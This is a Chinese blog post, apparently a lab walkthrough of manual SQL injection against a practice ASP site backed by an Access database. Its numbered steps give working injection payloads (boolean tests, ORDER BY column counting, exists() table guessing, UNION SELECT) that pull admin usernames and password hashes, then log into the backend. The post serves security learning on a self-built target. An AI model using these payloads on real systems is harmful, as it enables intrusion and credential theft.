ACCESS⼿⼯注⼊

于 2024-08-20 20:49:29 发布
阅读量127 收藏 3
点赞数 3
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/141367230
版权
1.靶场搭建

下载地址:https://pan.baidu.com/s/1y6Gkvo7Wsbwj_zNbaBiCmA 提取码: kjg7

将下载好的文件解压到网站根目录(wwwroot)之下

 打开iis,绑定ip

启用父路径,点击调试属性,将错误发送给浏览器设置为true

启动32位运行程序

2.访问网站

访问 ’绑定的IP‘/index.csp

3.寻找注入点

4.判断闭合方式
news_view.asp?id=14' // 报错
news_view.asp?id=14 and 1=1 // 正常
news_view.asp?id=14 and 1=2 // 错误

 5.判断列数
news_view.asp?id=14 order by 7 // ⻚⾯正常
news_view.asp?id=14 order by 8 // ⻚⾯报错,说明有 7

6. 寻找目标表
news_view.asp?id=14 and exists(select * from admin)  //报错,说明该表不存在

 news_view.asp?id=14 and exists(select * from users)  //报错,说明该表不存在

news_view.asp?id=14 and exists(select * from administrator)  //未报错,说明从该表返回数据,该表存在

7.判断回显位置

 news_view.asp?id=14 union select 1,2,3,4,5,6,7 from administrator //⻚⾯正常

 8.猜字段名

news_view.asp?id=14 union select 1,username,3,4,5,6,7 from administrator   //报错,说明没有username

 news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator   //正常,说明存在这⼀列

news_view.asp?id=14 union select 1,user_name,password,4,5,6,7 from administ

rator// 成功查到密码
 9.MD5解码

10.扫描目录

找到后台登录

 登录

完成!!!

无敌的俊哥
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
⽹络安全学习计划
qq_45541451的博客
07-15 5590
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全具基础部分三、常⻅web漏洞解析四、web安全具进阶及拓展五、web安全
Access 2010数据库引擎
04-11
Access 2010数据库引擎是Microsoft Office 2010套装中的一部分,它提供了对多种数据库格式的支持,包括但不限于Access数据库(.mdb和.accdb)以及通用的OLE DB和ODBC数据源。这个数据库引擎被称为Jet或者ACE(Access...
各种数据库
最新发布
2301_78031880的博客
08-20 565
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。
Spring IOC
Yearsuree的博客
05-15 202
Spring IOC Spring** 框架 2.1. Spring 框架概念 Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。 在项⽬中引 Spring ⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。当我们使⽤容器管理事务时,开发⼈员就不再需要⼿控制
最新渗透测试面试题合集
热门推荐
网络安全
05-17 1万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有合作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
Spring IOC详细介绍
weixin_44454512的博客
11-28 1793
Spring IOC 1. 主要内容 2. Spring 框架 2.1. Spring 框架概念   Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。   在项⽬中引Spring⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。 可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。 当我们使⽤容器管理事务时,
Spring概述(APO与IOC介绍与使用)
weixin_43118617的博客
09-10 974
一,Spring介绍 1.1,Spring 简介 Spring 是分层的 full-stack(全栈) 轻量级开源框架,以 IoC 和 AOP 为内核,提供了展现层 Spring MVC 和业务层事务管理等众多的企业级应⽤技术,还能整合开源世界众多著名的第三⽅框架和类库,已经成为使⽤最多的 Java EE 企业应⽤开源框架。 Spring 官⽅⽹址:http://spring.io/ 我们经常说的 Spring 其实指的是Spring Framework(spring 框架)。 1.2,Spring 发
Spring IOC简单入门
qq_43517448的博客
11-22 154
Spring IOC: 主要内容: Spring框架 Spring框架概念 ​ Spring 是众多开源java项⽬中的⼀员,基于分层的javaEE应⽤⼀站式轻量级开源框架,主要核⼼是IOC(控制反转/依赖)与 AOP(⾯向切⾯)两⼤技术,实现项⽬在开发过程中的轻松解耦,提⾼项⽬的开发效率。 ​ 在项⽬中引 Spring ⽴即可以带来下⾯的好处 降低组件之间的耦合度,实现软件各层之间的解耦。可以使⽤容器提供的众多服务,如:事务管理服务、消息服务等等。当我们使⽤容器管理事务时,开发⼈员就不再需要⼿
Spring笔记
Author1thy的博客
10-25 271
第一部分 Spring概述 第1节Spring简介 Spring 是分层的 full-stack(全栈) 轻量级开源框架,以 IoC 和 AOP 为内核,提供了展现层 Spring MVC 和业务层事务管理等众多的企业级应⽤技术,还能整合开源世界众多著名的第三⽅框架和类库,已 经成为使⽤最多的 Java EE 企业应⽤开源框架。 Spring 官⽅⽹址:http://spring.io/ 我们经常说的 Spring 其实指的是Spring Framework(spring 框架)。 第2节Spring 发展
spring基础知识点讲解,spring面试题
kitty_hi的博客
05-08 145
spring相关知识讲解1. Spring 概述1.1 Spring简介1.2 Spring优势1.3 Spring 的核⼼结构2. Spring的核心思想2.1 IoC2.1.1 什么是IoC2.1.2 IoC解决了什么问题2.1.3 IoC和DI的区别2.2 AOP2.2.1 什么是AOP2.2.2 AOP在解决什么问题2.2.3 为什么叫做面向切面编程3. Spring IOC 应⽤3.1 Spring IoC基础3.1.1 BeanFactory与ApplicationContext区别 1. Sp
Access练习题带答案
03-06
Access练习题带答案
电脑串口监听工具AccessPort
08-02
缺点:不能监控已打开的串口、已打开的串口必须先关闭,运行accessport监控后重新打开,才能监控到数据监控USB串口过程中不能拔掉USB串口、否则关闭监控或关闭accessport时、会导致系统蓝屏、如果需要拔出USB串口,...
access2013驱动
12-19
Access的驱动
64位ODBC驱动程序 Access 及 Excel
11-09
64位windows平台默认不安装Access的64位ODBC驱动,此下载将安装一系列组件,帮助在现有的 Microsoft Office 文件(例如 Microsoft Office Access 2010(*.mdb 和 *.accdb)文件和 Microsoft Office Excel 2010(*....
Linux日常运维小结
lza20001103的博客
08-14 1022
Linux日常运维小结
ddos造成服务器瘫痪后怎么办
IDC_USA的博客
08-15 434
服务器遭受DDoS攻击后,应立即采取相应措施,包括加强服务器安全、使用CDN和DDoS防御服务来减轻攻击的影响。rak小编为您整理发布ddos造成服务器瘫痪后怎么办。
windows bat脚本基础指令详解
weixin_39789796的博客
08-16 382
CMD在解释我们的命令的时候,首先会读取命令行一条完整的命令。如果我们要在我们的命令中引用一些变量,那么我们如何让CMD在解释我们的命令时。当CMD在对读取我们的整行命令进行格式匹配的时候,就会发现name这个字符两边加了%号,就不会把他当作普通字符处理,而是会把他当 作一个变量处理。然后CMD就会找到变量名对应的值,用变量名的值替换掉这个变量名字(name),(如果变量名不存在值,就返回空 值)。这个在预编译的时候将%var%替换成%%i,但是%%i又不认识是什么,所以程序在运行的时候就会出错。
仿RabbiteMq实现简易消息队列正式篇(需求分析)
m0_62812354的博客
08-14 1175
TOC消息队列中间件是在分布式系统中重要的组件,主要解决等等问题。实现高性能,高可用,可伸缩和最终一致性架构,是大型分布式系统不可缺少的中间件。目前常用的消息队列是RabbitMq, KafKa,ZeroMq,MetaMq等。我们是仿照RabbitMq实现简易的消息队列,就得先了解RabbitMq,RabbitMq是一种开源消息中间件,使用Erlang语言进行开发,实现了高级消息队列协议(AMQP)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值